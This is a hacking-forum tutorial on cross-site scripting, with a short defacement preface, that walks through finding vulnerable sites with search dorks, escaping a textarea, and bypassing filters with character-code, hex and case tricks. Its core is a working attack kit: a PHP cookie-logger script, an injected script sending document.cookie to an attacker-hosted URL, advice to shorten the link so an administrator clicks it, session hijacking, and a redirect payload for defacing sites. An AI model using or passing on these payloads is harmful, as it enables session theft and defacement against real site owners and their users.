How its Possible bypassed on XSS Deface

1. String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59) <---- XSS Strings
2.  
3. After the url like- site.com/search?q=<script>alert("server ghost was here");</script> and then click ok! if you see that javascript working! now make a image or photo or a website that will show that site was hacked! now the link will be like this <html><body><img src="imagelink.jpg"/></body></html> now save this code to anywhere in the website that will store it example comment box etc etc
4.  
5. we can use html also <h1>Kyfx in Server</h1>
6. its not mandatory we have to usejava script
7. and sometimes firewalls blocks this kind of attempts so use bypass
8.  
9.  
10. Bottom Creds to dR.0xYw0Rm
11.  
12. XSS EXPLAINED IN DEPTH
13.  
14. This is my first XSS tutorial which I will explain in depth what XSS is and how it works.
15. I will try to explain in the most n00b friendly way.
16. Even the biggest websites might be vulnerable to XSS!! So never underastimate it!
17. KEEP IN MIND: This is for educational and informational purposes only so Me & CrackHackForum will not be held responsible for deals made by you.
18. What is XSS ?
19. [*]"XSS" is a short form for: "Cross Site Scripting" as you can see by the name , XSS
20. deals with scripting. To be more exact: Javascript.
21. It's about injecting (almost) every Javascript (and html/css)
22. command/script in a website.
23. XSS flaws comes up every time a website doesn't filter the attackers input.
24. In other words:
25. the attacker can inject his malicious script into a website, and the browser just
26. run's the code or script.
27. What is HTML ?
28. [*]HyperText Markup Language (HTML) is the main markup language for creating web pages and other information that can be displayed in a web browser.
29. What is Javascript?
30. [*]JavaScript (JS) is an interpreted computer programming language. As part of web browsers, implementations allow client-side scripts to interact with the user, control the browser, communicate asynchronously, and alter the document content that is displayed. It has also become common in server-side programming, game development and the creation of desktop applications.
31. Difference between Java & Javascript
32. [*]Java is an OOP programming language while Java Script is an OOP scripting language.
33. Java creates applications that run in a virtual machine or browser while JavaScript code is run on a browser only.
34. Java code needs to be compiled while JavaScript code are all in text.
35. They require different plug-ins.
36. Types of XSS:
37. -[*]Reflected or Nonpersistent XSS Attack:
38. When a attacker inject his malicious script into a searchquery, a searchbox,
39. or the end of an url, it's called Reflected XSS Attack. It's like throwing a ball
40. against a wall and receive him back.
41. [*]Stored or Persistent XSS Attack:
42. Is when an injected XSS script is stored permanent on a website, for example in
43. a guestbook or bulletin board. Stored XSS hit's everyone who just reaches the
44. site with the malicious code.
45. [*]Traditional versus DOM-based vulnerabilities
46. This is a rare used method. Traditionally, cross-site scripting vulnerabilities would occur in server-side code responsible for preparing the HTML response to be served to the user. DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.
47. We need to have some knowledge before attempting to perform XSS attack that's why I made the listing above.
48. How can we find websites vulnerable to XSS ?
49. [*]Google Dorks
50. [*]Web vulnerability scanners
51. [*]Manually
52. [*] Google Dorks:
53. Code:
54. inurl:search.php?
55. inurl:find.php?
56. inurl:search.html
57. inurl:find.html
58. inurl:search.aspx
59. inurl:find.aspx
60. [*] Web vulnerability scanners:
61. Code:
62. Acunetix
63. Skipfish
64. OWASP Zap
65. Nessus , etc
66. [*] Manually which I am going to explain to you now.
67. You don't need to add random vectors to the search box or whatever it is , you just need to analyze the source code.
68. So..can we have a look inside the code and see what the hell is going there ?
69. YES !
70. So I will show you guys how to analyze the source code and manipulate that damn alert box to fuckin' prompt.
71. Ok this is my input box where I will insert:
72. Code:
73. dR.0xYw0Rm
74. [Image: tutorial1_zps3d773bc7.png]
75. Lets click get source and we will have a look what's happening inside the source code..
76. [Image: tutorial2_zpseebb546e.png]
77. Code:
78. <textarea cols="80" rows="20" name="headers">dR.0xYw0Rm</textarea>
79. Hmmm.. let's try to close the </textarea> tags like this:
80. Code:
81. </textarea>dR.0xYw0Rm
82. [Image: tutorial3_zps165854c8.png]
83. Let's go again inside the source code and check..
84. [Image: tutorial4_zps90ba9937.png]
85. So as we can see now the source code has changed from:
86. Code:
87. dR.0xYw0Rm</textarea>
88. to
89. Code:
90. </textarea>dR.0xYw0Rm
91. Which means that we have closed the textarea tags and we can try to insert our evil code..Let's have a look at the page...do you see any difference ?
92. Image has been scaled down 4% (700x378). Click this bar to view original image (727x392). Click image to open in new window.
93. [Image: tutorial5_zpsd7d8a00b.png]
94. Ok the dR.0xYw0Rm ended up out of the box cry emoticon Toungee
95. Let's try to insert the javascript code now *devilface*
96. Code:
97. <script>alert("dR.0xYw0Rm")</script>
98. [Image: tutorial6_zps3518ede8.png]
99. No box prompted ? frown emoticon Let's check the source code:
100. [Image: tutorial7_zpscebf3ab5.png]
101. Code:
102. <textarea cols="80" rows="20" name="headers"></textarea><script>alert(\"dR.0xYw0Rm\")</script>
103. Damn , the quotes -> " <- got filtered..
104. There are many different filters which they don't allow the box to prompt.
105. Can we do smth to bypass them ?!
106. DAMN YEAH !!!
107. Ok, now we are going to encrypt our text to ASCII language with a function called "String.FromCharCode" text to ASCII
108. Code:
109. </textarea><script>alert(String.fromCharCode(100,82,46,48,120,89,119,48,82,109))</script>
110. Don't feel confused!
111. The numbers below are the ASCII vaules for dR.0xYw0Rm
112. Code:
113. 100,82,46,48,120,89,119,48,82,109
114. So our code dont contain quotes anymore.Dance
115. Let's insert it to the box
116. [Image: tutorial8_zps3078f5b9.png]
117. Let's click "get source" to execute the code,
118. [Image: tutorial9_zpsb15e1982.png]
119. So here it is !! We got the alert box which means that the target is vulnerable to XSS !!!
120. This is the proper way to check for XSS vulnerabilities on websites.
121. XSS Advanced Methods
122. Now I will share with you guys some ways to use XSS against a target.
123. KEEP IN MIND THAT ANYTHING EVIL YOU DO TO A TARGET , YOU CAN END UP IN REALLY BIG TROUBLES !! SO ANYTHING YOU DO , YOU DO ON YOUR OWN , THIS IS JUST FOR EDUCATIONAL & INFOMATIONAL PURPOSE !!!
124. Cookie Stealing
125. [*]Cookie stealing is the most dangerous attack we can do with a Non-Persistent XSS , it will log the cookies of the user who will access the page to a certain doc.
126. Now I am going to explain you step by step how to do this.
127. First we need to find a hosting website , personally I suggest you to use 000webhost.com for uploading malicious codes or anything else. So let's open an account in there.
128. Now once we have created our site , let's go to File Manager, create a new file , rename it CookieLog.txt
129. Leave that file blank , don't put anything inside. Now create another file called CookieLogger.php
130. In this file we have to add some code so it will send the cookies that will log into the CookieLog.txt
131. So add the code below to the CookieLogger.php , don't forget to name it with .php extension otherwise it wont work!
132. Code:
133. <?php
134. /*
135. * Created on 16. april. 2007
136. * Created by Audun Larsen ([email protected])
137. *
138. * Copyright 2006 Munio IT, Audun Larsen
139. *
140. * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
141. * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
142. * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
143. * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
144. * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
145. * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
146. * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
147. * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
148. */
149. if(strlen($_SERVER['QUERY_STRING']) > 0) {
150. $fp=fopen('./CookieLog.txt', 'a');
151. fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
152. fclose($fp);
153. } else {
154. ?>
155. var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';
156. // ==
157. // URLEncode and URLDecode functions
158. //
159. // Copyright Albion Research Ltd. 2002
160. // http://www.albionresearch.com/
161. //
162. // You may copy these functions providing that
163. // (a) you leave this copyright notice intact, and
164. // (b) if you use these functions on a publicly accessible
165. // web site you include a credit somewhere on the web site
166. // with a link back to http://www.albionresearch.com/
167. //
168. // If you find or fix any bugs, please let us know at albionresearch.com
169. //
170. // SpecialThanks to Neelesh Thakur for being the first to
171. // report a bug in URLDecode() - now fixed 2003-02-19.
172. // And thanks to everyone else who has provided comments and suggestions.
173. // ==
174. function URLEncode(str)
175. {
176. // The Javascript escape and unescape functions do not correspond
177. // with what browsers actually do...
178. var SAFECHARS = "0123456789" + // Numeric
179. "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
180. "abcdefghijklmnopqrstuvwxyz" +
181. "-_.!~*'()"; // RFC2396 Mark characters
182. var HEX = "0123456789ABCDEF";
183. var plaintext = str;
184. var encoded = "";
185. for (var i = 0; i < plaintext.length; i++ ) {
186. var ch = plaintext.charAt(i);
187. if (ch == " ") {
188. encoded += "+"; // x-www-urlencoded, rather than %20
189. } else if (SAFECHARS.indexOf(ch) != -1) {
190. encoded += ch;
191. } else {
192. var charCode = ch.charCodeAt(0);
193. if (charCode > 255) {
194. alert( "Unicode Character '"
195. + ch
196. + "' cannot be encoded using standard URL encoding.\n" +
197. "(URL encoding only supports 8-bit characters.)\n" +
198. "A space (+) will be substituted." );
199. encoded += "+";
200. } else {
201. encoded += "%";
202. encoded += HEX.charAt((charCode >> 4) & 0xF);
203. encoded += HEX.charAt(charCode & 0xF);
204. }
205. }
206. } // for
207. return encoded;
208. };
209. cookie = URLEncode(document.cookie);
210. html = '<img src="'+ownUrl+'?'+cookie+'">';
211. document.write(html);
212. < ?php
213. }
214. ?>
215. Now that we have our cookie logger , we have to send it to the victim , which will be the website administrator.
216. In order so the url will be less suspicious we need to Tiny the Url.
217. Let's go to tinyurl.com and put the url, but don't forget to add the script at the end of the url
218. and then Tiny it!
219. This is the script:
220. Code:
221. <script>document.location="http://www.myhost.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
222. Once you get the cookie, you can use the firefox addon called "Cookie Manager" to manipulate or edit the cookie so you can hijack the administrator session.
223. DEFACING
224. In order to deface a website with XSS you need to find a persistent XSS.
225. You can use the script below to redirect the visitors to your deface page. I suggest you to use
226. pastehtml[dot]com as it allows anonymous uploading.
227. Code:
228. <script>window.location="http://www.pastehtml.com/YOURDEFACE/";</script>
229. XSS Filters Bypassing Methods:
230. [*]ASCII Bypassing
231. [*]Hex Bypassing
232. [*]Case Sensitive
233. [*]ASCII Bypassing when magic_quotes_gpc=ON
234. It causes that every " (double quote) ' (single quote), and \ (backslash)
235. are escaped with a backslash automatically.
236. How to bypass it ?
237. use the javascript function called
238. Code:
239. String.fromCharCode()
240. just convert your text in decimal characters as I showed to you guys when we were performing the "attack"
241. [*]Hex Bypassing
242. We encode our script into Hex so we can't see clearly on the first look what the code will cause.
243. The text:
244. Code:
245. <script>alert(dR.0xYw0Rm)</script>
246. How to bypass it ?
247. The text Hex encoded:
248. Code:
249. %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%52%2e%30%78%59%77%30%52%6d%29%3c%2f%73%63%72%69%70%74%3e
250. [*]Case Sensitive Bypassing
251. This kind of bypass works just in really old filters & stupid filters but it's always worth a try !
252. All we need to do is executing a script with different size of charachters.
253. How to bypass it ?
254. Code:
255. <sCrIpT>alert('dR.0xYw0Rm');</ScRiPt>
256. I hope I clarified what XSS is and how it works , if you need help don't hesitate to PM me.
257. This tutorial is wrote all by me && it took a lot of time.
258. A simple +rep or thank you to keep the thread alive would be appreciated.
259. L33ch it but don't forget to give credits.
260. ~ dR.0xYw0Rm